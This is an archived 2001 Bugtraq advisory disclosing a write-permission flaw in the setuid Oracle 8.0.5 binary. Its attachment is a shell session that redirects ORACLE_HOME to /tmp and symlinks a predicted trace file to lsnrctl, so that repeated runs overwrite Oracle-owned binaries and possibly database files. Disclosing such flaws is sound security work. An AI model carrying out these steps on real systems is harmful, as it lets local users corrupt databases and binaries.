Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Thu, 02 Aug 2001 09:57:26 +0200
From: Juan Manuel Pascual Escriba <pask@plazasite.com>
To: bugtraq@securityfocus.com, oracle-l@faticity.com
Subject: vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6

--------------6B84FF8612CCC30679044832
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit




                      WWW.PLAZASITE.COM

                  System & Security Division





   Title:     Vulnerability in oracle binary in Oracle 8.0.5

    Date:     11-12-2000

Platform:     Only tested in Linux, but can be "exported" to others.

  Impact:     Any user compromise any file owned by oracle (DDBB owner).

  Author:     Juan Manuel Pascual (pask@plazasite.com)

  Status:     Vendor Contacted at 18th July 2001

PROBLEM SUMMARY:
    There is a write permision checking error in oracle binary  that can
be used by local
users to write any file owned by oracle.

IMPACT:
    Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted .

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@plazasite.com





























--------------6B84FF8612CCC30679044832
Content-Type: text/plain; charset=us-ascii;
 name="oracle-8.0.5.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="oracle-8.0.5.txt"

Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$ 
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
-rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

Upsssssssss a log owned by oracle with the structure ora_pid.trc 
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log will be my link .. and i overwrite the binary. what about dbf files and go on ....



--------------6B84FF8612CCC30679044832--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: